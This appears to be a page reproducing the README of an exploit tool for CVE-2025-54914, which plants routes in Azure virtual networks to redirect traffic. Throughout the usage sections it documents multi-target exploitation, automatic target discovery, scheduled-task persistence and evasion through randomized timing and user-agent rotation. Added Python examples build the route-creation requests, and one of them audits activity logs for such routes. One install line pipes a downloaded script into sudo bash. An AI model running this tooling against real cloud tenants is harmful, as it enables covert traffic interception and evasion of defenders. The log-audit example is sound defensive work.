Related vulnerabilities
Introduction
# CVE-2025-54914 Azure Route Exploit
## Overview
This is an improved implementation of the CVE-2025-54914 Azure Networking route exploit. It keeps the core CVE functionality (route create/delete through the Azure Management API) and adds persistence, evasion, multi-target scanning, and error handling on top of it.
## Features
### Core CVE Functionality
- **Route Creation**: Creates malicious routes in Azure virtual networks
- **Route Deletion**: Removes created routes for cleanup
- **API Compatibility**: Works with Azure Management API 2025-09-01
- **Authentication**: Supports Azure CLI and manual token authentication
### Enhanced Features
- **Evasion Techniques**: Random delays, user agent rotation, request obfuscation
- **Persistence**: Scheduled task creation, continuous monitoring mode
- **Multi-Target Scanning**: Concurrent scanning and exploitation of multiple targets
- **Comprehensive Reporting**: Detailed reports with success/failure analysis
- **Error Handling**: Graceful failure handling and recovery
- **Configuration Management**: JSON-based target configuration
- **Target Discovery**: Automatic discovery of vulnerable resources
- **Risk Assessment**: Vulnerability analysis and risk scoring
## Installation
### Prerequisites
```bash
# Install Python dependencies
pip install requests
# Install Azure CLI (for authentication); fetch and review the script before piping it to sudo
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
```
### Setup
```bash
# Make scripts executable
chmod +x exploit.py
chmod +x exploit_utils.py
# Authenticate with Azure
az login
```
## Usage
### Basic Usage
#### Single Target Exploitation
```bash
# Create route on single target
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"
# Delete route
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete
```
#### Multi-Target Exploitation
```bash
# Create configuration file
python exploit_utils.py discover --output targets.json
# Exploit all targets
python exploit.py --targets-file targets.json --operation create
```
#### Scan Mode
```bash
# Scan targets without exploitation
python exploit.py --targets-file targets.json --scan-only
```
#### Persistence Mode
```bash
# Enable persistence with 30-minute intervals
python exploit.py --targets-file targets.json --persistence-mode --interval 30
```
### Advanced Usage
#### Evasion and Stealth
```bash
# Custom delay ranges for evasion
python exploit.py \
--targets-file targets.json \
--delay-min 1.0 \
--delay-max 5.0 \
--max-workers 5
```
#### Dry Run Mode
```bash
# Test without actual exploitation
python exploit.py --targets-file targets.json --dry-run
```
#### Detailed Logging
```bash
# Enable debug logging
python exploit.py \
--targets-file targets.json \
--log-level DEBUG \
--log-file exploit.log
```
## Configuration
### Target Configuration Format
```json
{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "Target configuration for CVE-2025-54914",
    "created": "2025-01-09",
    "version": "1.0"
  }
}
```
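The loader below is an added example for this page, not code from exploit.py or exploit_utils.py. It validates a targets file in the format above before anything is sent (UUID subscription, network-not-host CIDR prefix, next hop of the same IP family, recognisable api_version) and produces the request a create or delete would issue, which is what a `--dry-run` should show. Two things are assumptions not stated on the page: the operations are expressed as the standard ARM route-table route endpoint (`.../Microsoft.Network/routeTables/{table}/routes/{route}`), and the route table name is read from a hypothetical `route_table_name` key, defaulting to `<subnet_name>-rt` when absent.

```python
"""Load, validate and dry-run a targets.json in the format shown above.

Added example; not part of exploit.py/exploit_utils.py. Assumptions: routes are
addressed via the ARM route-table route endpoint, and an optional, hypothetical
"route_table_name" key names the table (default "<subnet_name>-rt").
"""
import ipaddress
import json
import re
import uuid

ARM = "https://management.azure.com"
NEXT_HOP_TYPES = {"VirtualAppliance", "VirtualNetworkGateway", "VnetLocal", "Internet", "None"}
API_VERSION_RE = re.compile(r"^\d{4}-\d{2}-\d{2}(-preview)?$")
REQUIRED = ("resource_group", "vnet_name", "subnet_name", "route_name", "address_prefix", "api_version")


class ConfigError(ValueError):
    """Raised for a target entry that must not be sent to the API."""


def validate_target(t: dict) -> dict:
    """Return a normalised copy of one target, or raise ConfigError."""
    try:
        uuid.UUID(str(t.get("subscription_id")))
    except ValueError:
        raise ConfigError("subscription_id must be a UUID")
    missing = [k for k in REQUIRED if not t.get(k)]
    if missing:
        raise ConfigError(f"missing keys: {', '.join(missing)}")
    try:
        # strict=True rejects 10.0.1.5/24: ARM expects a network prefix, not a host
        prefix = ipaddress.ip_network(t["address_prefix"], strict=True)
    except ValueError as e:
        raise ConfigError(f"bad address_prefix: {e}")
    hop_type = t.get("next_hop_type", "VirtualAppliance")
    if hop_type not in NEXT_HOP_TYPES:
        raise ConfigError(f"unknown next_hop_type {hop_type!r}")
    hop_ip = None
    if hop_type == "VirtualAppliance":
        try:
            hop_ip = ipaddress.ip_address(t.get("next_hop_ip", ""))
        except ValueError:
            raise ConfigError("next_hop_ip must be an IP when next_hop_type is VirtualAppliance")
        if hop_ip.version != prefix.version:
            raise ConfigError("next_hop_ip and address_prefix must be the same IP family")
    if not API_VERSION_RE.match(t["api_version"]):
        raise ConfigError("api_version must look like YYYY-MM-DD")
    out = dict(t)
    out["next_hop_type"] = hop_type
    out["next_hop_ip"] = str(hop_ip) if hop_ip else None
    out["priority"] = int(t.get("priority", 1))
    return out


def route_url(t: dict) -> str:
    table = t.get("route_table_name") or f"{t['subnet_name']}-rt"  # assumption, see docstring
    return (f"{ARM}/subscriptions/{t['subscription_id']}"
            f"/resourceGroups/{t['resource_group']}"
            f"/providers/Microsoft.Network/routeTables/{table}"
            f"/routes/{t['route_name']}?api-version={t['api_version']}")


def plan(t: dict, operation: str) -> dict:
    """Describe the request an operation would send, without sending it (dry run)."""
    t = validate_target(t)
    if operation == "create":
        props = {"addressPrefix": t["address_prefix"], "nextHopType": t["next_hop_type"]}
        if t["next_hop_type"] == "VirtualAppliance":
            props["nextHopIpAddress"] = t["next_hop_ip"]
        return {"method": "PUT", "url": route_url(t), "body": {"properties": props}}
    if operation == "delete":
        return {"method": "DELETE", "url": route_url(t), "body": None}
    raise ConfigError(f"unknown operation {operation!r}")


def load_targets(text: str) -> list:
    doc = json.loads(text)
    targets = doc.get("targets")
    if not isinstance(targets, list) or not targets:
        raise ConfigError("'targets' must be a non-empty list")
    return [validate_target(t) for t in targets]


# Constructed sample mirroring the page's format (not a real tenant).
SAMPLE = json.dumps({"targets": [{
    "subscription_id": "12345678-1234-1234-1234-123456789012",
    "resource_group": "production-rg", "vnet_name": "prod-vnet",
    "subnet_name": "prod-subnet", "route_name": "exploit-route-1",
    "address_prefix": "10.0.1.0/24", "next_hop_type": "VirtualAppliance",
    "next_hop_ip": "10.0.2.5", "api_version": "2025-09-01", "priority": 1}]})

if __name__ == "__main__":
    for tgt in load_targets(SAMPLE):
        print(json.dumps(plan(tgt, "create"), indent=2))
```

Running it prints the PUT the sample target would produce; a target with a host prefix such as `10.0.1.5/24` or a missing `next_hop_ip` is rejected before any token is used.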
### Environment Variables
```bash
# Azure access token (alternative to Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"
# Log level
export LOG_LEVEL="INFO"
```
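The token handling below is an added example for this page, not code from exploit.py. It honours the `AZURE_ACCESS_TOKEN` variable documented above, otherwise falls back to `az account get-access-token` (a real Azure CLI command), and then decodes the JWT payload locally to catch the two common causes of a 401 before the first request: an expired token and a token minted for the wrong audience. The decode does not verify the signature, so it only rules tokens out, it never proves one valid; the `make_unsigned_jwt` helper exists solely to build constructed test tokens.

```python
"""Resolve the management-plane bearer token and sanity-check it locally.

Added example, not part of exploit.py. Reads AZURE_ACCESS_TOKEN, else calls
`az account get-access-token`. Claims are decoded WITHOUT signature
verification: this detects expiry/wrong audience, nothing more.
"""
import base64
import json
import os
import subprocess
import time

# Both audiences are accepted by management.azure.com; compared without trailing slash.
MGMT_AUDIENCES = {"https://management.azure.com", "https://management.core.windows.net"}


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_claims(token: str) -> dict:
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT (expected header.payload.signature)")
    return json.loads(_b64url_decode(parts[1]))


def inspect_token(token: str, now: float = None, skew: int = 60) -> dict:
    """Report expiry and audience; 'skew' seconds of margin avoids racing the exp claim."""
    claims = decode_claims(token)
    now = time.time() if now is None else now
    exp = float(claims.get("exp", 0))
    aud = str(claims.get("aud", "")).rstrip("/")
    return {
        "expired": exp - skew <= now,
        "seconds_left": int(exp - now),
        "aud_ok": aud in MGMT_AUDIENCES,
        "aud": aud,
        "tenant": claims.get("tid"),
        # user tokens carry upn; service-principal tokens carry appid
        "principal": claims.get("upn") or claims.get("appid") or claims.get("oid"),
    }


def get_token() -> str:
    token = os.environ.get("AZURE_ACCESS_TOKEN")
    if token:
        return token
    result = subprocess.run(
        ["az", "account", "get-access-token", "--resource",
         "https://management.azure.com/", "--query", "accessToken", "-o", "tsv"],
        capture_output=True, text=True, check=True)
    return result.stdout.strip()


def make_unsigned_jwt(claims: dict) -> str:
    """Constructed alg=none token for offline tests only; Azure never issues these."""
    header = _b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    return f"{header}.{payload}."


if __name__ == "__main__":
    report = inspect_token(get_token())
    if report["expired"] or not report["aud_ok"]:
        raise SystemExit(f"token unusable for ARM: {report}")
    print(f"token ok for tenant {report['tenant']} as {report['principal']}, "
          f"{report['seconds_left']}s left")
```

A token issued for Microsoft Graph or another resource will decode fine but fail the audience check, which is the usual reason a pasted `AZURE_ACCESS_TOKEN` yields 401s while `az` itself works.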
## Utility Scripts
### Target Discovery
```bash
# Discover all accessible targets
python exploit_utils.py discover --output discovered_targets.json
# Discover specific subscriptions
python exploit_utils.py discover \
--subscription-ids "sub1" "sub2" \
--output targets.json \
--report discovery_report.txt
```
### Configuration Generation
```bash
# Generate exploit configuration from discovered targets
python exploit_utils.py config \
--input discovered_targets.json \
--output exploit_config.json \
--address-prefix "10.0.1.0/24" \
--next-hop-ip "10.0.2.5"
```
### Vulnerability Analysis
```bash
# Analyze targets for risk assessment
python exploit_utils.py analyze \
--input targets.json \
--output vulnerability_report.txt
```
## Security Features
### Evasion Techniques
- **Request Timing**: Random delays between requests
- **User Agent Rotation**: Multiple browser user agents
- **Header Obfuscation**: Realistic HTTP headers
- **TLS Verification**: Certificate validation is left enabled rather than disabled
### Persistence Mechanisms
- **Scheduled Tasks**: Windows scheduled task creation
- **Continuous Mode**: Long-running persistence
- **Session Management**: State preservation across runs
- **Configuration Persistence**: Settings saved to disk
### Error Handling
- **Graceful Degradation**: Continues on individual failures
- **Timeout Protection**: Prevents hanging requests
- **Signal Handling**: Clean shutdown on interruption
- **Resource Cleanup**: Automatic cleanup on exit
## Reporting
### Exploit Reports
- **Operation Results**: Success/failure for each target
- **Timing Information**: Execution timestamps
- **Error Details**: Detailed error messages
- **Summary Statistics**: Overall success rates
### Discovery Reports
- **Target Inventory**: Complete list of discovered resources
- **Subscription Breakdown**: Targets grouped by subscription
- **Resource Details**: VNet, subnet, and location information
### Vulnerability Analysis
- **Risk Assessment**: High/medium/low risk categorization
- **Production Indicators**: Identification of production environments
- **Tag Analysis**: Risk scoring based on resource tags
## Best Practices
### Operational Security
1. **Use Dry Run**: Always test with `--dry-run` first
2. **Limit Scope**: Start with non-production environments
3. **Monitor Logs**: Review logs for unexpected behavior
4. **Clean Up**: Remove created routes after testing
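For the "Monitor Logs" and "Clean Up" items, the defender-side counterpart is an audit of the Azure Activity Log for route-table changes, which is also the quickest way to confirm every test route was removed. The script below is an added example for this page, not part of the project: the events are constructed to follow the Azure Monitor activity-log event shape (`operationName.value`, `caller`, `resourceId`, `status.value`, `eventTimestamp`, and `properties.requestbody` where the platform records it), and the approved-caller list and the route-name pattern are assumptions a team would replace with its own.

```python
"""Audit Azure Activity Log events for route-table writes and deletes.

Added example; not part of the project. SAMPLE_EVENTS are constructed.
APPROVED_CALLERS and SUSPICIOUS_ROUTE_NAME are placeholder assumptions.
"""
import json
import re

ROUTE_OPS = {
    "Microsoft.Network/routeTables/routes/write",
    "Microsoft.Network/routeTables/routes/delete",
    "Microsoft.Network/routeTables/write",
    "Microsoft.Network/routeTables/delete",
}
APPROVED_CALLERS = {"netops-automation@contoso.example"}          # assumption
SUSPICIOUS_ROUTE_NAME = re.compile(r"exploit|poc|tmp", re.IGNORECASE)  # assumption
ROUTE_ID = re.compile(r"/routeTables/([^/]+)(?:/routes/([^/]+))?$", re.IGNORECASE)

SUB = "/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/production-rg"
TABLE = SUB + "/providers/Microsoft.Network/routeTables/prod-subnet-rt"

# Constructed: a PoC-style write, a routine change, an unrelated op, and the PoC cleanup.
SAMPLE_EVENTS = [
    {"eventTimestamp": "2025-01-09T10:00:00Z", "caller": "contractor@contoso.example",
     "operationName": {"value": "Microsoft.Network/routeTables/routes/write"},
     "status": {"value": "Succeeded"}, "resourceId": TABLE + "/routes/exploit-route-1",
     "properties": {"requestbody": json.dumps({"properties": {
         "addressPrefix": "10.0.1.0/24", "nextHopType": "VirtualAppliance",
         "nextHopIpAddress": "10.0.2.5"}})}},
    {"eventTimestamp": "2025-01-09T10:05:00Z", "caller": "netops-automation@contoso.example",
     "operationName": {"value": "Microsoft.Network/routeTables/routes/write"},
     "status": {"value": "Succeeded"}, "resourceId": TABLE + "/routes/default-egress",
     "properties": {"requestbody": json.dumps({"properties": {
         "addressPrefix": "0.0.0.0/0", "nextHopType": "Internet"}})}},
    {"eventTimestamp": "2025-01-09T10:06:00Z", "caller": "contractor@contoso.example",
     "operationName": {"value": "Microsoft.Compute/virtualMachines/start/action"},
     "status": {"value": "Succeeded"}, "resourceId": SUB + "/providers/Microsoft.Compute/virtualMachines/vm1"},
    {"eventTimestamp": "2025-01-09T10:40:00Z", "caller": "contractor@contoso.example",
     "operationName": {"value": "Microsoft.Network/routeTables/routes/delete"},
     "status": {"value": "Succeeded"}, "resourceId": TABLE + "/routes/exploit-route-1"},
]


def parse_route_resource(resource_id: str):
    """Return (route_table, route_name); route_name is None for table-level operations."""
    m = ROUTE_ID.search(resource_id or "")
    return (m.group(1), m.group(2)) if m else (None, None)


def audit(events: list, approved=APPROVED_CALLERS) -> list:
    """Flag route-table operations by non-approved callers or with suspicious route names."""
    findings = []
    for ev in events:
        op = (ev.get("operationName") or {}).get("value", "")
        if op not in ROUTE_OPS:
            continue
        caller = ev.get("caller", "")
        table, route = parse_route_resource(ev.get("resourceId", ""))
        reasons = []
        if caller not in approved:
            reasons.append("caller not in allow-list")
        if route and SUSPICIOUS_ROUTE_NAME.search(route):
            reasons.append("suspicious route name")
        # Where the body is recorded, show what traffic was redirected and to where.
        redirect = None
        body = (ev.get("properties") or {}).get("requestbody")
        if body:
            try:
                props = json.loads(body).get("properties", {})
            except ValueError:
                props = {}
            if props.get("nextHopType") == "VirtualAppliance":
                redirect = f"{props.get('addressPrefix')} -> {props.get('nextHopIpAddress')}"
        if reasons:
            findings.append({"time": ev.get("eventTimestamp"), "caller": caller, "operation": op,
                             "status": (ev.get("status") or {}).get("value"),
                             "table": table, "route": route, "redirect": redirect, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_EVENTS):
        print(json.dumps(f))
```

Failed attempts are reported as well as successful ones, since a denied route write by an unexpected principal is exactly the signal "Verify Permissions" troubleshooting would otherwise hide. A write with no matching delete for the same route name is a test route that was never cleaned up.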
### Performance Optimization
1. **Worker Limits**: Adjust `--max-workers` based on system capacity
2. **Delay Tuning**: Balance stealth vs. speed with delay settings
3. **Batch Processing**: Use target files for large-scale operations
4. **Resource Monitoring**: Monitor system resources during execution
### Error Recovery
1. **Check Logs**: Review error messages for troubleshooting
2. **Verify Permissions**: Ensure proper Azure permissions
3. **Network Connectivity**: Verify internet connectivity
4. **Token Validity**: Check Azure CLI authentication status
## Troubleshooting
### Common Issues
#### Authentication Errors
```bash
# Re-authenticate with Azure
az login
# Check current account
az account show
# List accessible subscriptions
az account list
```
#### Permission Errors
```bash
# Check role assignments for the signed-in identity (add --all to include
# assignments scoped to resource groups and individual resources)
az role assignment list --assignee $(az account show --query user.name -o tsv)
```
#### Network Errors
```bash
# Test connectivity
curl -I https://management.azure.com
# Check proxy settings
echo $HTTP_PROXY
echo $HTTPS_PROXY
```
### Debug Mode
```bash
# Enable detailed logging
python exploit.py --log-level DEBUG --log-file debug.log
# Check log file
tail -f debug.log
```
## Legal and Ethical Considerations
⚠️ **IMPORTANT**: This tool is for authorized security testing only.
- **Authorization Required**: Only use on systems you own or have explicit permission to test
- **Legal Compliance**: Ensure compliance with local laws and regulations
- **Responsible Disclosure**: Report vulnerabilities through proper channels
- **Educational Use**: This tool is intended for educational and research purposes
## License
This project is licensed for research and educational use only. Commercial use requires explicit permission.
## Contributing
1. Fork the repository
2. Create a feature branch
3. Make your changes
4. Add tests if applicable
5. Submit a pull request
## Support
For issues and questions:
1. Check the troubleshooting section
2. Review the logs for error details
3. Create an issue with detailed information
4. Include relevant configuration and error messages
File snapshot
[4.0K] /data/pocs/a88f017238b668e16102607315f7971bd8dc3f35
├── [ 28K] exploit.py
├── [ 17K] exploit_utils.py
├── [1.0K] LICENSE
├── [8.3K] README.md
└── [1.3K] targets_sample.json
0 directories, 5 files